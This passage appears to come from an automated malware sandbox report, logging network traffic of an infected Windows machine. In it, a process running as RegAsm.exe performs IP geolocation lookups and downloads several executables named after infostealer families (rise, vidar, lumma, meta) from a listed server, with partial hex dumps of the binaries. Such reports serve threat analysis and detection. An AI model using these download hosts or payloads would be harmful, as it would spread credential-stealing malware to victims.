Jul 1, 2024 09:16:33.271644115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.271644115 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.271656990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.271668911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.271675110 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.271703005 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.271733046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.271754980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.271766901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.271812916 CEST	49782	9000	192.168.2.4	195.201.251.214

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 09:16:07.566090107 CEST	192.168.2.4	1.1.1.1	0x6a2e	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:08.258686066 CEST	192.168.2.4	1.1.1.1	0x8fee	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:20.059067965 CEST	192.168.2.4	1.1.1.1	0x1195	Standard query (0)	potterryisiw.shop	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:20.557262897 CEST	192.168.2.4	1.1.1.1	0x2d5	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 09:16:07.573050976 CEST	1.1.1.1	192.168.2.4	0x6a2e	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:08.268295050 CEST	1.1.1.1	192.168.2.4	0x8fee	No error (0)	db-ip.com	104.26.4.15	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:08.268295050 CEST	1.1.1.1	192.168.2.4	0x8fee	No error (0)	db-ip.com	104.26.5.15	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:08.268295050 CEST	1.1.1.1	192.168.2.4	0x8fee	No error (0)	db-ip.com	172.67.75.166	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:20.129781961 CEST	1.1.1.1	192.168.2.4	0x1195	No error (0)	potterryisiw.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:20.129781961 CEST	1.1.1.1	192.168.2.4	0x1195	No error (0)	potterryisiw.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 1, 2024 09:16:20.565026045 CEST	1.1.1.1	192.168.2.4	0x2d5	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49752	77.105.132.27	80	7624	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 09:16:12.117019892 CEST	220	OUT	HEAD /rise2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:12.799442053 CEST	275	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:51:24 GMT ETag: "1c4c00-61c16bf47b4d0" Accept-Ranges: bytes Content-Length: 1854464 Content-Type: application/x-msdownload
Jul 1, 2024 09:16:12.808298111 CEST	219	OUT	GET /rise2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:13.007853031 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:51:24 GMT ETag: "1c4c00-61c16bf47b4d0" Accept-Ranges: bytes Content-Length: 1854464 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 18 1a 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 1c 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x+++z+z+z+k\+k\+z++(+k\+Z_+Z_+Z_+Rich+PELqf'@RtP@p@P<Ph@Pd.text.0 `.BsS@4 `.rdata4PD@@.data4I:@.relocP.@B
Jul 1, 2024 09:16:13.007882118 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 08 39 5c 00 e8 94 3e 00 00 68 98 3d 42 00 e8 84 66 00 Data Ascii: 9\>h=BfYh=BxfYh=BlfYjjh;\<\6Jh=BMfYVWjY;\JjV;\0aBNh=BfY_^<\$=\<\H(=\<<\;\=h=B
Jul 1, 2024 09:16:13.007898092 CEST	128	IN	Data Raw: ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 89 44 24 10 8d 44 24 10 56 50 53 e8 3d ff ff ff 8b 4c 24 1c 8b f0 57 ff 74 24 1c 89 33 56 89 7b 10 89 4b 14 e8 74 6f 00 00 83 c4 14 c6 04 3e 00 5e 5f 5b c2 08 00 e8 12 22 00 00 cc cc 55 8b ec 6a ff 68 00 Data Ascii: ;BD$D$VPS=L$Wt$3V{Kto>^_["Ujh:BdPSVW@)\3PEde]U
Jul 1, 2024 09:16:13.007908106 CEST	1236	IN	Data Raw: 8b c2 2b c1 89 45 e8 8b 43 04 2b c1 3d ff ff ff 7f 0f 84 48 01 00 00 8d 78 01 89 7d e0 8b 73 08 2b f1 8b ce d1 e9 b8 ff ff ff 7f 2b c1 3b f0 76 2c be ff ff ff 7f 89 75 ec b8 22 00 00 80 50 e8 3e 5c 00 00 83 c4 04 85 c0 0f 84 1a 01 00 00 8d 78 23 Data Ascii: +EC+=Hx}s++;v,u"P>\x#GUA1;CrF#u;tV[EuU3u}EME9C;u+PQW+RQW^nMACU+PRQEnE
Jul 1, 2024 09:16:13.007917881 CEST	224	IN	Data Raw: 76 28 8b 46 14 41 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 36 8b c2 51 50 e8 b7 57 00 00 83 c4 08 6a 2c 56 c7 46 24 00 00 00 00 c7 46 28 0f 00 00 00 c6 46 14 00 e8 9a 57 00 00 83 c4 08 80 7f 0d 00 74 9e 5e 5b 5f 5d c2 Data Ascii: v(FArP#+w6QPWj,VF$F(FWt^[_]X@)\3D$TD$\SUl$\|L$L$pD$(L$Vt$\|Wt<+t<-u3A%0=0tTB"CTB;w<0uLxtX
Jul 1, 2024 09:16:13.007936954 CEST	1236	IN	Data Raw: 75 02 8b d8 52 56 e8 3c c8 00 00 89 44 24 2c b8 2e 00 00 00 66 89 44 24 1c e8 ab c8 00 00 8b 00 8a 00 88 44 24 1c 8d 44 24 1c 50 56 e8 16 c8 00 00 8b f8 83 c4 10 8b 44 24 20 8b 40 30 8b 48 04 89 4c 24 2c 89 4c 24 1c 8b 01 ff 50 04 8d 44 24 18 50 Data Ascii: uRV<D$,.fD$D$D$PVD$ @0HL$,L$PD$PL$0D$tPtjjUL$<\|$HD$4L$GD$4P.PVRL$ A0HL$PD$PL$ tPtjL$LQP@D$
Jul 1, 2024 09:16:13.007947922 CEST	1236	IN	Data Raw: 00 8b f0 83 c4 04 85 f6 0f 84 a0 00 00 00 8b 44 24 64 8b 40 04 85 c0 74 0c 8b 78 18 85 ff 75 0a 8d 78 1c eb 05 bf 11 53 42 00 6a 00 8d 4c 24 30 e8 f9 2e 00 00 33 c0 c7 44 24 30 00 00 00 00 c6 44 24 34 00 c7 44 24 38 00 00 00 00 c6 44 24 3c 00 c7 Data Ascii: D$d@txuxSBjL$0.3D$0D$4D$8D$<D$@fD$DD$HfD$LD$PD$TD$XD$\toD$,WPU5D$$FPSBS6FD$3tL$,V3R58\L$._^][PhRB0
Jul 1, 2024 09:16:13.007961035 CEST	448	IN	Data Raw: 08 8b c6 5e c2 04 00 68 f4 52 42 00 e8 28 2c 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 54 a1 40 29 5c 00 33 c4 89 44 24 50 53 55 56 8b 74 24 6c 0f 57 c0 57 8b f9 8b de 0f 11 44 24 18 83 7e 14 0f 76 02 8b 1e 8b 76 10 81 fe ff ff ff 7f Data Ascii: ^hRB(,T@)\3D$PSUVt$lWWD$~vvw&l$ht$(D$,\$l\$D$tsa=v;BD$D$PD$Pt$0D$D$4FPSQL$,^$l$hD$jh\|RBL$
Jul 1, 2024 09:16:13.007972002 CEST	1236	IN	Data Raw: 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 3f 51 52 e8 80 4b 00 00 83 c4 08 8b 4c 24 68 8b c7 8b 54 24 6c 89 4f 0c 8b 4c 24 60 c7 07 74 52 42 00 89 57 10 5f 5e 5d 5b 33 cc e8 6b 4b 00 00 83 c4 54 c2 0c 00 e8 76 10 00 00 e8 90 95 00 00 e8 8b 95 00 Data Ascii: P#+w?QRKL$hT$lOL$`tRBW_^][3kKTvVt$WWGPRBfFPXtRBFNGO_^VWFPRBfD$PX(RB^VWFPRBfD$P}X
Jul 1, 2024 09:16:13.007977962 CEST	224	IN	Data Raw: 00 8b ce 5e e9 15 24 00 00 cc cc 8d 41 04 c7 01 08 52 42 00 50 e8 e2 54 00 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 49 04 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 c3 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 60 Data Ascii: ^$ARBPTYItPtjUjh`:BdP4SVW@)\3PEdeu3}VM}@D00X]PEPEtRtjEHQ8
Jul 1, 2024 09:16:13.008121967 CEST	1236	IN	Data Raw: c6 45 d4 00 89 55 d8 ff 75 08 0f b6 41 40 50 51 52 ff 75 d4 8d 45 d4 50 8b 4d e4 e8 2b 21 00 00 b9 04 00 00 00 80 38 00 0f 45 f9 89 7d e8 c7 45 fc ff ff ff ff eb 2b 6a 01 6a 04 8b 55 ec 8b 02 8b 48 04 03 ca e8 31 21 00 00 b8 35 2c 40 00 c3 c7 45 Data Ascii: EUuA@PQRuEPM+!8E}E+jjUH1!5,@Eu}@39P8EHH@#u;]$}u@L88tPMdY_^[]tPSBhSBSBDjEPPVMh
Jul 1, 2024 09:16:15.484914064 CEST	221	OUT	HEAD /vidar2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:15.682125092 CEST	273	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 28 Jun 2024 09:54:34 GMT ETag: "69200-61bf03c16d934" Accept-Ranges: bytes Content-Length: 430592 Content-Type: application/x-msdownload
Jul 1, 2024 09:16:15.682615042 CEST	220	OUT	GET /vidar2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:15.880870104 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 28 Jun 2024 09:54:34 GMT ETag: "69200-61bf03c16d934" Accept-Ranges: bytes Content-Length: 430592 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b 91 b1 d7 5f f0 df 84 5f f0 df 84 5f f0 df 84 8c 82 dc 85 4e f0 df 84 8c 82 da 85 f4 f0 df 84 8c 82 db 85 49 f0 df 84 9d 71 db 85 4d f0 df 84 9d 71 dc 85 4a f0 df 84 8c 82 de 85 58 f0 df 84 5f f0 de 84 df f0 df 84 9d 71 da 85 09 f0 df 84 ac 72 da 85 5e f0 df 84 ac 72 df 85 5e f0 df 84 ac 72 dd 85 5e f0 df 84 52 69 63 68 5f f0 df 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 56 88 7e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 6a 02 00 00 36 04 00 00 00 00 00 67 92 00 00 00 10 00 00 00 80 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$___NIqMqJX_qr^r^r^Rich_PELV~f'j6g@@)P@*P4X@d.text7XZ `.BsSMp^ `.rdatafn@@.data`@P"@.reloc4 r@B
Jul 1, 2024 09:16:17.192711115 CEST	221	OUT	HEAD /lumma2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:17.393166065 CEST	273	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:52:30 GMT ETag: "81000-61c16c33a5f2a" Accept-Ranges: bytes Content-Length: 528384 Content-Type: application/x-msdownload
Jul 1, 2024 09:16:17.393723011 CEST	220	OUT	GET /lumma2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:17.592195034 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:52:30 GMT ETag: "81000-61c16c33a5f2a" Accept-Ranges: bytes Content-Length: 528384 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x+++z+z+z+k\+k\+z++(+k\+Z_+Z_+Z_+Rich+PELf'@RtP@0@P<h@Pd.text.0 `.BsS@4 `.rdata4PD@@.data@.reloc@B
Jul 1, 2024 09:16:19.279786110 CEST	220	OUT	HEAD /meta2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:19.477333069 CEST	273	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:53:32 GMT ETag: "55000-61c16c6e7cd68" Accept-Ranges: bytes Content-Length: 348160 Content-Type: application/x-msdownload
Jul 1, 2024 09:16:19.477901936 CEST	219	OUT	GET /meta2806.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 77.105.132.27 Cache-Control: no-cache
Jul 1, 2024 09:16:19.677536011 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Sun, 30 Jun 2024 07:53:32 GMT ETag: "55000-61c16c6e7cd68" Accept-Ranges: bytes Content-Length: 348160 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 dc 9a d7 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2a 05 00 00 24 00 00 00 00 00 00 2e 49 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 48 05 00 4b 00 00 00 00 60 05 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0$.I `@ @HK` H.text4) `.rsrc `",@@.relocN@BIHY`x0<)(0s~%:&~!s%(+o8[o%F~(%G~(%H~(%e~(~(o8(ss>~}~s(o}{I~(o9I~(8C~(o:{~(8{~(

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49741	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:15:56 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-07-01 07:15:56 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:15:56 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:15:56 UTC	319	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49748	34.117.186.192	443	7624	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:08 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 07:16:08 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 07:16:08 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 07:16:08 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 07:16:08 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49749	104.26.4.15	443	7624	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:08 UTC	260	OUT	GET /demo/home.php?s=8.46.123.33 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-07-01 07:16:08 UTC	653	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:08 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC467324:F3D4_93878F2E:0050_668257B8_16A14143:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXWhyU8fWqU7JTIKXr6L%2F9wWAxQjkKpem0yT5cyJi0sFeagly1LuzpKPLCRuqulqpvQjlZjdOPjxD43XqZXynhgo15rkB1Ne4mirwBRu3IPAGApv3%2BsekX2f2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49be348b978e7-EWR alt-svc: h3=":443"; ma=86400
